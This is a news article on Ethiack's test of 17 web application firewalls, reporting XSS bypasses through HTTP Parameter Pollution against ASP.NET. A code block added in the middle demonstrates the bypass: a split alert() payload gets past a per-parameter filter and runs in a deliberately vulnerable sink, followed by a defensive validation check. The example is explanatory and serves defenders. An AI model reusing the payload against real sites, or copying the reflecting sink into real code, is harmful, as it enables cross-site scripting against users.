- Ethiack recently tested 17 WAF configurations from major vendors
- As payload complexity increased, the WAF bypass success rate rose sharply
- Even the most sophisticated WAFs could be defeated with relatively simple payloads
Web application firewalls (WAFs) are not as resilient as organizations have been led to assume and can often be bypassed to inject malicious JavaScript, experts have warned.
Security researchers at Ethiack recently tested 17 WAF configurations from major vendors to see how well they block malicious payloads.
The in-depth report centered on a real-world penetration test against ASP.NET applications protected by a highly restrictive WAF. Despite the firewall's configuration, the researchers found they could exploit cross-site scripting (XSS) vulnerabilities using a technique called HTTP Parameter Pollution.
Analyzing parameters in isolation
The method abuses the way different web frameworks handle multiple parameters with the same name, often merging them in a way that can be manipulated to inject malicious JavaScript.
Ethiack said that as payload complexity increased, the WAF bypass success rate rose sharply: 17.6% for simple injections, climbing to more than 70% for advanced parameter pollution techniques.
Even machine-learning-based WAFs, designed to detect novel threats, were vulnerable to subtle parsing tricks and obfuscation, the report said. But Ethiack's most surprising finding was that even the most sophisticated WAFs could be defeated with relatively simple payloads.
The problem with WAFs appears to be that they analyze each parameter in isolation and rely heavily on pattern matching.
As a result, they are blind to the nuanced ways in which web applications parse and interpret input. For example, ASP.NET concatenates duplicate parameters with commas (a request carrying id=1&id=2 is read by the application as the single value "1,2"), and JavaScript treats comma-separated expressions as valid executable code.
By crafting payloads that split the malicious code across several parameters, the researchers were able to evade detection and execute JavaScript in the browser.
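The mechanism described above can be reproduced end to end in a few lines. The following is an added illustration, not Ethiack's code or any vendor's rule set: a toy WAF that matches signatures against one parameter value at a time, a back end that merges duplicate parameter names with commas the way ASP.NET's Request.QueryString does, and a vulnerable page that reflects the merged value into a script block. The rule set, the `id` parameter, the `track()` sink and the two sample requests are all constructed for the example; the point is only that the split request passes every per-parameter rule while the merged value is a valid JavaScript call.

```javascript
// Added example (not from the article or Ethiack). Emulates: a WAF that
// pattern-matches each query parameter in isolation, and an ASP.NET-style
// back end that joins duplicate parameters with "," before reflecting them.
// Rules, parameter names and sample requests are constructed for illustration.

// Toy signature set: each rule is applied to ONE parameter value at a time.
const WAF_RULES = [
  /\b(alert|prompt|confirm)\s*\([^)]*\)/i, // a complete pop-up call, the usual XSS PoC
  /<\s*script\b/i,
  /\bon\w+\s*=/i,
  /javascript\s*:/i,
];

// Per-parameter inspection, which is what the article says most WAFs do.
function wafBlocks(rawQuery) {
  const params = new URLSearchParams(rawQuery);
  for (const [, value] of params) {
    if (WAF_RULES.some((rule) => rule.test(value))) return true;
  }
  return false;
}

// Emulates ASP.NET's Request.QueryString[name]: duplicate names are joined with ",".
function aspNetValue(rawQuery, name) {
  const values = new URLSearchParams(rawQuery).getAll(name);
  return values.length ? values.join(",") : null;
}

// Vulnerable sink (constructed): the merged value is reflected unescaped into a JS call.
function renderPage(rawQuery) {
  const id = aspNetValue(rawQuery, "id");
  return `<script>track(${id})</script>`;
}

// Would the reflected script run an alert() in a browser? We only compile the
// script body to check it is syntactically valid JS; nothing is executed.
function scriptExecutesAlert(html) {
  const m = html.match(/<script>([\s\S]*)<\/script>/);
  if (!m) return false;
  try { new Function(m[1]); } catch (e) { return false; }
  return /\balert\s*\(/.test(m[1]);
}

// Application-level check, independent of the WAF: validate what the app actually
// consumes (after merging) and refuse duplicate parameters outright.
function appAccepts(rawQuery) {
  const params = new URLSearchParams(rawQuery);
  if (params.getAll("id").length !== 1) return false; // no parameter pollution
  return /^\d{1,10}$/.test(params.get("id"));         // id must be numeric
}

function demo(rawQuery) {
  const blocked = wafBlocks(rawQuery);
  return {
    wafBlocked: blocked,
    merged: aspNetValue(rawQuery, "id"),
    executes: !blocked && scriptExecutesAlert(renderPage(rawQuery)),
    appAccepts: appAccepts(rawQuery),
  };
}

// Constructed requests: the classic payload in one parameter, and the same
// call split across two parameters so that no single value looks like a call.
const SIMPLE = "id=alert(document.domain)";
const SPLIT = "id=alert(document.domain&id=1)"; // merges to alert(document.domain,1)

console.log(demo(SIMPLE)); // wafBlocked: true,  executes: false
console.log(demo(SPLIT));  // wafBlocked: false, executes: true, appAccepts: false
```

Note what the application-side check does that the WAF cannot: it looks at the value the framework hands the code after merging, and it rejects the duplicate `id` that the attack depends on. Context-aware output encoding in the `track()` sink would close the hole regardless of how the input arrives; the WAF rule set, however well tuned, only ever sees the fragments.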
“This finding highlights a critical vulnerability in basic security strategies: organizations can invest in costly WAF technologies while remaining vulnerable to attacks that exploit basic implementation gaps or configuration oversights,” the researchers concluded.
“This is a reminder that WAFs should not be used as a fix for the root problems of insecure code.”